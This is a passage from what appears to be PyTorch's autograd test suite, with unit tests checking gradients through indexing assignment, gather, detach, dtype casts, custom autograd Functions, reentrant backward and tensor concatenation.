    gradient to `value` and zero it for the overwritten slots of x."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    y_version = y._version
    value = x.new(x[index].size()).fill_(7)
    value.requires_grad = True
    y[index] = value
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    expected_grad_input = torch.ones(*size)
    expected_grad_input[index] = 0
    self.assertEqual(x.grad, expected_grad_input)
    # the assigned tensor receives the grad of the slots it filled
    self.assertEqual(value.grad, torch.ones_like(value))

    # case when x broadcasts to as y[1]
    x = torch.randn(4, requires_grad=True)
    y = torch.zeros(2, 3, 4)
    y[1] = x
    y.backward(torch.randn(2, 3, 4))
    self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
    """Drive the setitem helpers over scalar, list, slice and tensor
    index forms, with both constant and tensor right-hand sides."""
    self._test_setitem((5, 5), 1)
    self._test_setitem((5,), 1)
    self._test_setitem((1,), 0)
    self._test_setitem((10,), [[0, 4, 2]])
    self._test_setitem((5, 5), [[0, 4], [2, 2]])
    self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5), 3)
    self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
    self._test_setitem_tensor((5,), 3)
    self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
    self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
                              3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
    """Boolean-mask setitem must behave like the other index forms."""
    mask = torch.BoolTensor(5, 5).bernoulli_()
    self._test_setitem((5, 5), Variable(mask))
    self._test_setitem((5,), Variable(mask[0]))
    self._test_setitem((1,), Variable(mask[0, 0:1]))
    self._test_setitem_tensor((5, 5), Variable(mask))
    self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
    # both select and sum return Scalars in ATen; ensure they work together.
    x = torch.randn(10, dtype=torch.double, requires_grad=True)

    def sum_of_select(t):
        return t.select(0, 1).sum()

    gradcheck(sum_of_select, [x])
    gradgradcheck(sum_of_select, [x])
def test_diagonal_expanded_v(self):
    """grad through diagonal() with an expanded grad_output must scatter
    the value back onto the diagonal."""
    value = torch.rand([])
    v_expanded = torch.tensor(value).expand(10)
    a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
    result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
    self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
    """grad of a[0] with an expanded grad_output lands only in slice 0."""
    grad_out = torch.rand(10).expand(10, 10)
    a = torch.rand(10, 10, 10, requires_grad=True)
    result, = torch.autograd.grad(a[0], a, grad_out)
    expected = torch.zeros(10, 10, 10)
    expected[0] = grad_out
    self.assertEqual(result, expected)
def test_slice_expanded_v(self):
    """grad of a[3:5] with an expanded grad_output fills only that slice."""
    grad_out = torch.rand(10, 1).expand(2, 10, 10)
    a = torch.rand(10, 10, 10, requires_grad=True)
    result, = torch.autograd.grad(a[3:5], a, grad_out)
    expected = torch.zeros(10, 10, 10)
    expected[3:5] = grad_out
    self.assertEqual(result, expected)
def test_unbind(self):
    """Gradients through unbind(): all outputs together reassemble the
    full grad, and a single output yields a one-hot stacked grad."""
    stacked = torch.randn(3, 10, 10, requires_grad=True)
    x, y, z = stacked.unbind()
    grad = torch.randn(3, 10, 10)
    torch.autograd.backward([x, y, z], grad.unbind())
    self.assertEqual(stacked.grad, grad)
    # check that it works with only one gradient provided (#9977)
    for i in range(3):
        stacked = torch.randn(3, 10, 10, requires_grad=True)
        outs = stacked.unbind()
        gi = grad.unbind()[i]
        g, = torch.autograd.grad(outs[i], stacked, gi)
        g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
                                  for j in range(3)], dim=0)
        self.assertEqual(g, g_expected)
def test_fill(self):
    """fill_ on a clone must stay differentiable w.r.t. the original root."""
    root = torch.randn(4, 5, requires_grad=True)

    def filled_clone(t):
        out = t.clone()
        out.fill_(2)
        return out

    gradcheck(filled_clone, [root])
    gradgradcheck(filled_clone, [root])
def test_unused_output(self):
    """Backward through one chunk() output must leave the grad for the
    unused chunks at zero."""
    x = torch.randn(10, 10, requires_grad=True)
    outputs = x.chunk(5)
    o = outputs[2]
    o = o * 4 + 2
    o.sum().backward()
    expected_grad = torch.zeros(10, 10)
    # chunk 2 covers rows 4:6 of the 10-row input
    expected_grad[4:6] = 4
    self.assertEqual(x.grad, expected_grad)

    with torch.no_grad():
        x.grad.zero_()
    grad_output = torch.randn(2, 10)
    outputs = x.chunk(5)
    outputs[0].backward(grad_output)
    expected_grad = torch.zeros(10, 10)
    expected_grad[:2] = grad_output
    self.assertEqual(x.grad, expected_grad)
def _test_sparse_gather(self, size_x, size_ind, dim):
    """Check that gather with sparse_grad=True produces the same gradient
    (after to_dense()) as the dense-grad path.

    Args:
        size_x: shape of the source tensor.
        size_ind: shape of the index tensor.
        dim: dimension to gather along.
    """
    x = torch.randn(size_x, requires_grad=True)
    if len(size_ind) > 0 and len(size_x) > 0:
        ind = torch.randint(x.size(dim), size_ind)
    else:
        # scalar source and/or index: only index 0 is valid
        ind = torch.zeros(size_ind, dtype=torch.int64)
    out = torch.gather(x, dim, ind, sparse_grad=False)
    grad = torch.rand_like(out)
    out.backward(grad)
    grad_dense = x.grad.clone()
    x.grad = None
    out = torch.gather(x, dim, ind, sparse_grad=True)
    out.backward(grad)
    self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
    # gather along the first dimension
    self._test_sparse_gather((10, 10), (5, 10), 0)

def test_sparse_gather_dim1(self):
    # gather along a middle dimension
    self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)

def test_sparse_gather_dim_neg(self):
    # negative-dim indexing
    self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)

def test_sparse_gather_ind_scalar(self):
    # scalar index tensor
    self._test_sparse_gather((10,), (), 0)

def test_sparse_gather_x_scalar(self):
    # scalar source tensor
    self._test_sparse_gather((), (2,), 0)

def test_sparse_gather_both_scalar(self):
    # both source and index are scalars
    self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
    """
    Previously, if a Function destructor triggered a garbage collection,
    the Variable's tp_dealloc handler would get called twice leading to a
    segfault.
    """
    # Legacy-style (non-static-method) autograd Function on purpose.
    class CollectOnDelete(Function):
        def forward(self, x):
            return x
        def backward(self, grad_output):
            return grad_output
        def __del__(self):
            # force a GC pass from inside the Function destructor
            gc.collect()
    for _ in range(10):
        CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_variable_grad_fn(self):
    """Constructing a Variable with a legacy-Function _grad_fn must raise."""
    class Id(Function):
        def forward(self, x):
            return x
        def backward(self, grad_x):
            return grad_x
    self.assertRaises(RuntimeError, lambda: Variable(torch.zeros(1), _grad_fn=Id()))
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_function_backward_before_forward(self):
    """Calling _do_backward on a legacy Function before forward() must raise."""
    class Id(Function):
        def forward(self, x):
            return x
        def backward(self, grad_x):
            return grad_x
    f = Id()
    self.assertRaises(RuntimeError, lambda: f._do_backward((torch.zeros(0), ), False))
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_function_early_access(self):
    """Accessors on a legacy Function raise before the function is applied."""
    class Id(Function):
        def forward(self, x):
            return x
        def backward(self, grad_x):
            return grad_x
    f = Id()
    # A legacy autograd function is not fully initialized until you actually
    # apply it. That means a lot of accessors on them don't actually work.
    # Test that we properly error in this case.
    self.assertRaises(RuntimeError, lambda: f.register_hook(lambda x, y: None))
    self.assertRaises(RuntimeError, lambda: f.next_functions)
    self.assertRaises(RuntimeError, lambda: f.metadata)
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
    """Accessing grad_fn.metadata after the output tensor is deleted
    currently fails; marked expectedFailure until fixed."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x
        @staticmethod
        def backward(ctx, g):
            return g
    x = torch.zeros(1, requires_grad=True)
    y = MyFunction.apply(x)
    y.backward()
    y.grad_fn.metadata
    g = y.grad_fn
    del y
    g.metadata  # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
    """Stashing ctx out of backward() and reading saved_tensors after the
    graph is freed must raise instead of returning stale data."""
    saved_ctx = []
    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            ctx.save_for_backward(x)
            return x
        @staticmethod
        def backward(ctx, grad_x):
            # leak ctx so the test can poke at it after graph teardown
            saved_ctx.append(ctx)
            return ctx.saved_tensors
    p = torch.zeros(1, requires_grad=True)
    loss = Id.apply(p)
    loss.backward(retain_graph=True)
    del loss
    # At this point in time, it complains that the graph has been freed
    # (which indeed true, although a somewhat indirect way of stating the
    # problem).
    self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
    # This test failed the equality check in PR #22983; it's an interesting
    # and different test case worth enshrining. mult1 is not testing
    # anything that interesting, but mult2 is the interesting case.
    def mult1(x):
        # product over the last two dims -> shape (batch,)
        return x.prod(dim=-1).prod(dim=-1)
    class Mult(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = mult1(x)
            # saving the *output* y is what makes this case interesting
            ctx.save_for_backward(x, y)
            return y
        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return (grad_output * y)[:, None, None] / x
    mult2 = Mult.apply
    def check_gradgrad_repeated(x, y):
        # double-backward computed twice must agree element-for-element
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
    x = torch.ones(2, 4, 4).requires_grad_()
    check_gradgrad_repeated(x, mult1(x))
    check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
    # This test failed complaining that buffers had already been freed
    # prior to #22983. Also pretty interesting test case.
    class Double(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = x ** 2
            ctx.save_for_backward(x, y)
            return y
        @staticmethod
        def backward(ctx, grad_output):
            x, _ = ctx.saved_tensors
            return grad_output * 2 * x
    # this is equivalent, but uses the output of .forward() in .backward()
    class Double2(Double):
        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            # mathematically the same as 2*x since y == x**2
            return grad_output * 2 * y / x
    double = Double.apply
    double2 = Double2.apply
    x = torch.tensor(2).double().requires_grad_()
    self.assertTrue(gradcheck(double, x))
    self.assertTrue(gradgradcheck(double, x))
    self.assertTrue(gradcheck(double2, x))
    self.assertTrue(gradgradcheck(double2, x))
    y = double(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)
    y = double2(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)  # should not error!
def test_detach(self):
    """detach() and detach_() cut the graph: detached results don't require
    grad, grads stop at the detach point, and detach_() on a view raises."""
    x = torch.randn(10, 10, requires_grad=True)
    y = x + 2
    y = y.detach()
    z = y * 4 + 2
    self.assertFalse(y.requires_grad)
    self.assertFalse(z.requires_grad)
    x = torch.randn(10, 10, requires_grad=True)
    y = x * 2
    y = y.detach()
    self.assertFalse(y.requires_grad)
    self.assertIsNone(y.grad_fn)
    z = x + y
    z.sum().backward()
    # This is an incorrect gradient, but we assume that's what the user
    # wanted. detach() is an advanced option.
    self.assertEqual(x.grad, torch.ones(10, 10))
    # in-place detach
    x = torch.randn(10, 10, requires_grad=True)
    y = torch.randn(10, 10, requires_grad=True)
    a = x * 2
    (y + a).sum().backward(retain_graph=True)
    a.detach_()
    self.assertFalse(a.requires_grad)
    (y + a).sum().backward()  # this won't backprop to x
    self.assertEqual(x.grad, torch.ones(10, 10) * 2)
    self.assertEqual(y.grad, torch.ones(10, 10) * 2)
    # in-place detach on a view raises an exception
    view = x.narrow(0, 1, 4)
    self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
    """Detaching the base tensor must not detach an existing view of it."""
    base = torch.randn(10, 10, requires_grad=True)
    narrow_view = base.narrow(0, 1, 4)
    base.detach_()
    self.assertFalse(base.requires_grad)
    # the view keeps its autograd connection
    self.assertTrue(narrow_view.requires_grad)
    self.assertIsNotNone(narrow_view.grad_fn)
    self.assertIs(narrow_view._base, base)
def _test_type_conversion_backward(self, t, ):
    """Backprop through dtype casts (float->double and double->float);
    the grad comes back with the same type as the leaf.

    Args:
        t: callable mapping a CPU tensor to the device/layout under test
           (e.g. identity or ``.cuda()``).
    """
    fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
    fvar.double().sum().backward()
    self.assertEqual(fvar.grad, torch.ones_like(fvar))
    self.assertEqual(type(fvar.grad), type(fvar))
    dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
    dvar.float().sum().backward()
    self.assertEqual(dvar.grad, torch.ones_like(dvar))
    self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
    """Casts (float/int/cuda/type/type_as) produce the right legacy tensor
    types, preserve the device, share storage when the dtype is unchanged,
    and backprop through cross-dtype/device casts."""
    x = torch.randn(5, 5)
    self.assertIsInstance(x.float(), torch.FloatTensor)
    self.assertIsInstance(x.int(), torch.IntTensor)
    if torch.cuda.is_available():
        self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
        self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
        self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
        if torch.cuda.device_count() >= 2:
            x2 = x.float().cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            x2 = x.float().cuda()
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 0)
            x2 = x2.cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            y = Variable(torch.randn(5).cuda(1), requires_grad=True)
            y.cpu().sum().backward()
            # grad lands on the leaf's device, not the cpu
            self.assertIs(y.grad.get_device(), 1)
            self.assertIs(y.long().get_device(), 1)
    for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
        for y_var in (True, False):
            y = torch.randint(5, (5, 5), dtype=t.dtype)
            y = Variable(y) if y_var else y
            self.assertIsInstance(x.type(t), t)
            self.assertIsInstance(x.type_as(y), t)
            # TODO: t.dtype should work
            t_dtype = t().dtype
            self.assertIsInstance(x.type(t_dtype), t)
            self.assertIs(t_dtype, x.type(t_dtype).dtype)
            # same-dtype .type() is a no-op and shares storage
            self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
            if torch.cuda.is_available():
                for x_cuda in (True, False):
                    for y_cuda in (True, False):
                        x_c = x.cuda() if x_cuda else x
                        y_c = y.cuda() if y_cuda else y
                        _, y_type = y_c.type().rsplit('.', 1)
                        y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
                        self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
                        self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
                        self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
    self._test_type_conversion_backward(lambda x: x)
    if torch.cuda.is_available():
        self._test_type_conversion_backward(lambda x: x.cuda())
        if torch.cuda.device_count() >= 2:
            # one of these has to be the non-default device
            self._test_type_conversion_backward(lambda x: x.cuda(0))
            self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
    """Backward through a graph containing a non-differentiable branch
    (argmax indices) must not error."""
    u = torch.randn(5, 5, requires_grad=True)
    v = torch.randn(5, 5, requires_grad=True)
    s = u + v
    # max-indices are non-differentiable, isolating that node from the graph
    idx_branch = torch.max(s, 1, True)[1].repeat(1, 5).double()
    loss = (idx_branch + s).sum()
    loss.backward()
def test_shape(self):
    """`Tensor.shape` reports the correct rank and per-dimension sizes."""
    t = torch.randn(3, 4)
    self.assertEqual(len(t.shape), 2)
    self.assertEqual(3, t.shape[0])
    self.assertEqual(4, t.shape[1])
def test_numpy_requires_grad(self):
    """numpy() on a tensor that requires grad raises (even under no_grad);
    tensors that don't require grad convert freely."""
    x = torch.randn(2, 2, requires_grad=True)
    err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
    with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
        x.numpy()
    # no_grad does not lift the restriction for a requires-grad tensor
    with torch.no_grad():
        x.numpy()
    x = torch.randn(2, 2)
    x.numpy()
    with torch.no_grad():
        x.numpy()
def test_return_leaf(self):
    """A custom Function returning one of its inputs: hooks registered on
    the returned alias only see gradient from its own uses."""
    class Identity(Function):
        @staticmethod
        def forward(ctx, a, b):
            return a, a + b
        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a + grad_b, grad_b
    hook_called = [False]
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    q, p = Identity.apply(x, y)
    # Make sure hooks only receive grad from usage of q, not x.
    def hook(grad):
        hook_called[0] = True
        self.assertEqual(grad, torch.ones(5, 5))
    q.register_hook(hook)
    (q + p + x).sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5) * 3)
    self.assertEqual(y.grad, torch.ones(5, 5))
    self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
    """An InplaceFunction that mark_dirty()s and returns its input: the
    returned tensor is the same object, gains requires_grad, and backprops
    correctly to the other input."""
    class Inplace(InplaceFunction):
        @staticmethod
        def forward(ctx, a, b):
            ctx.mark_dirty(a)
            return a.add_(b), b + 2
        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a, grad_a + grad_b
    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)
    fn = Inplace(True)
    q, p = fn.apply(x, y)
    # in-place op returns the very same tensor object
    self.assertIs(q, x)
    self.assertIs(q.grad_fn.__class__, fn._backward_cls)
    self.assertTrue(q.requires_grad)
    q.sum().backward()
    self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
    """Assigning requires-grad tensors into rows of a plain tensor makes
    it require grad, and backward reaches the assigned leaves."""
    x = torch.randn(5, 5)
    y = torch.randn(5, requires_grad=True)
    z = torch.randn(5, requires_grad=True)
    x[0] = y
    x[1] = 2 * z
    self.assertTrue(x.requires_grad)
    self.assertIsNot(x.grad_fn, None)
    x.sum().backward()
    self.assertEqual(y.grad, torch.ones(5))
    self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
    """Index-assignment under no_grad is not recorded: the target stays a
    leaf (no grad_fn) while still requiring grad."""
    target = torch.randn(5, 5, requires_grad=True)
    row = torch.randn(5)
    with torch.no_grad():
        target[0] = row
    self.assertTrue(target.requires_grad)
    self.assertIsNone(target.grad_fn)
def test_no_grad_modifies_version(self):
    """In-place ops under no_grad still bump the version counter, so a
    later backward that needs the old value raises."""
    x = torch.randn(5, requires_grad=True)
    y = torch.randn(5, requires_grad=True)
    z = (x * y).sum()
    with torch.no_grad():
        x *= 2
    self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
                           lambda: z.backward())
def test_no_grad_input(self):
    """Applying a custom Function under no_grad records nothing: the
    output has no grad_fn while the input keeps requires_grad."""
    class MyFunction(Function):
        @staticmethod
        def forward(self, x):
            return x
        @staticmethod
        def backward(self, grad_output):
            return grad_output
    x = torch.randn(5, requires_grad=True)
    with torch.no_grad():
        y = MyFunction.apply(x)
    self.assertTrue(x.requires_grad)
    self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
    # This test checks the backward engine for a very subtle bug that appeared
    # in one of the initial versions of autograd. Gradients tensors were
    # simply stored in lists while the function waited for all its gradients
    # to be computed. However, sometimes an output was used multiple times,
    # so the gradients needed to be summed. Engine used to keep a need_copy
    # set of tensors that will need a clone upon next addition and removed
    # them from the set as soon as the clone was performed. However, this
    # could lead to incorrect results if the same gradient tensor was
    # buffered in three places in the graph:
    # 1. When accumulating gradients in one of these places it was cloned
    #    and removed from need_copy set.
    # 2. When accumulating in second place, it wasn't in the need_copy set,
    #    so the gradients were simply accumulated in-place (which already
    #    modified the grad in 3rd place)
    # 3. When accumulating in the third place, it wasn't in the need_copy set
    #    as well, so the incoming gradient was summed in-place, yielding
    #    incorrect results in all functions, except the first one.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5, requires_grad=True)
    # Simulate that we're in the middle of the graph
    a = x + 2
    b = y + 2
    c = x + 2
    # This op will just return grad_output two times in backward
    add1 = a + b
    add2 = add1 + c
    # Simulate a long branch, so grad_output will get buffered.
    for _ in range(4):
        a = a * 2
        b = b * 2
        c = c * 2
    branch = a + b + c
    out = add2 + branch
    # expected gradients are:
    # for x: 34 (16 from final a, 16 from final c, 2 from add2)
    # for y: 17 (16 from final b, 1 from add2)
    grad_output = torch.ones(5, 5)
    out.backward(grad_output)
    self.assertEqual(x.grad, torch.ones(5, 5) * 34)
    self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
    """save_for_backward accepts None entries and hands them back as None
    from saved_tensors."""
    test_case = self
    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            ctx.save_for_backward(None, input, None)
            return input * input
        @staticmethod
        def backward(ctx, grad_output):
            n1, input, n2 = ctx.saved_tensors
            test_case.assertIsNone(n1)
            test_case.assertIsNone(n2)
            return 2 * input * grad_output
    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
    """backward() may return extra trailing None gradients; they are
    ignored rather than raising."""
    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            return input
        @staticmethod
        def backward(ctx, grad_output):
            # two surplus None grads for non-existent inputs
            return grad_output, None, None
    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
    """Tensors round-trip through pickle protocols 0-2, preserving both
    values and the requires_grad flag."""
    a = torch.randn(10, 10, requires_grad=True)
    b = torch.randn(10, 10, requires_grad=False)

    def check_same(got, want):
        self.assertEqual(got, want)
        self.assertEqual(got.requires_grad, want.requires_grad)

    for proto in range(3):
        payload = pickle.dumps([a, b], protocol=proto)
        a_copy, b_copy = pickle.loads(payload)
        check_same(a_copy, a)
        check_same(b_copy, b)
def test_dep_nograd(self):
    """mark_non_differentiable() outputs don't require grad, and grads
    flow correctly past a Function that consumes such an output."""
    class F1(Function):
        @staticmethod
        def forward(ctx, input):
            out = torch.randn(input.size())
            ctx.mark_non_differentiable(out)
            return input, out
        @staticmethod
        def backward(ctx, grad_output, ignored):
            return grad_output
    class F2(Function):
        @staticmethod
        def forward(ctx, input, ignored):
            return input
        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, None
    x = torch.randn(5, requires_grad=True)
    a, b = F1.apply(x)
    b = b + 1  # separate F1 from F2 by another op
    self.assertTrue(a.requires_grad)
    self.assertFalse(b.requires_grad)
    c = F2.apply(a, b)
    c.backward(torch.ones(c.size()))
    self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
    """set_grad_enabled works both as a context manager and as a plain
    call inside another set_grad_enabled context."""
    x = torch.tensor([1.], requires_grad=True)
    with torch.set_grad_enabled(False):
        y = x * 2
    self.assertFalse(y.requires_grad)
    with torch.set_grad_enabled(True):
        y = x * 2
    self.assertTrue(y.requires_grad)
    with torch.set_grad_enabled(False):
        # plain-call form overrides the enclosing context
        torch.set_grad_enabled(True)
        y = x * 2
    self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
    """A Function whose backward() itself calls backward() (reentrant
    autograd) produces the correct gradient."""
    y_data = torch.randn(2, 2)
    class Reenter(Function):
        @staticmethod
        def forward(ctx, x):
            # build an internal graph under enable_grad so backward()
            # can re-enter the engine on it
            with torch.enable_grad():
                ctx.x = Variable(x, requires_grad=True)
                ctx.y = Variable(y_data, requires_grad=True)
                ctx.output_var = ctx.x * ctx.y
            return ctx.output_var.detach()
        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                ctx.output_var.sum().backward()
            return ctx.x.grad * grad_output
    # Reentrant starts on CPU thread, finishs on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    out = Reenter.apply(x)
    out.sum().backward()
    self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
    """An error raised inside a reentrant (child) backward propagates out
    of the parent backward call."""
    # Parent graph.
    a = torch.rand(3, 3, requires_grad=True)
    c = a * a
    # Reentrant child graph.
    b = torch.rand(3, 3, requires_grad=True)
    e = b * b
    # SimulateBackwardError is a helper Function defined on this TestCase
    f = TestAutograd.SimulateBackwardError.apply(e)
    reentrant_root = f.sum()
    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()
        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will throw an error.
            reentrant_root.backward()
            return grad
    d = ReentrantFunc.apply(c)
    with self.assertRaisesRegex(Exception, 'Simulate error'):
        d.sum().backward()
def test_broadcast_tensors(self):
    """gradcheck torch.broadcast_tensors over four broadcastable shapes
    via the file-level run_functional_checks helper."""
    f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
                       torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(1, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_broadcast_tensors", "broadcast",
                          lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
                          True, f_args_variable, f_args_tensor)
def test_block_diag(self):
    """gradcheck torch.block_diag on three differently-sized blocks
    (S is a file-level size constant)."""
    f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
                       torch.randn(2, S, dtype=torch.double, requires_grad=True),
                       torch.randn(3, S, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_block_diag", "block_diag",
                          lambda a, b, c: torch.block_diag(a, b, c),
                          True, f_args_variable, f_args_tensor)
def test_cat(self):
    """gradcheck torch.cat along dim 0 with three inputs."""
    f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
                       torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
                       torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
                       0)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor)
def test_cat_negdim_1(self):
    """gradcheck torch.cat along dim -1."""
    f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
                       -1)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_1", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor)
def test_cat_negdim_2(self):
    """gradcheck torch.cat along dim -2."""
    f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
                       -2)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_2", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor)
def test_cat_empty_legacy(self):
    """gradcheck torch.cat with a legacy 1-D empty tensor input."""
    f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, dtype=torch.double, requires_grad=True))
    # gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
    # hence False passed below, but gradcheck checked explicitly.
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty_legacy", "cat",
                          lambda a, b: torch.cat((a, b)),
                          False, f_args_variable, f_args_tensor)
    self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
    """gradcheck torch.cat with a (0, S) empty tensor input."""
    f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty", "cat",
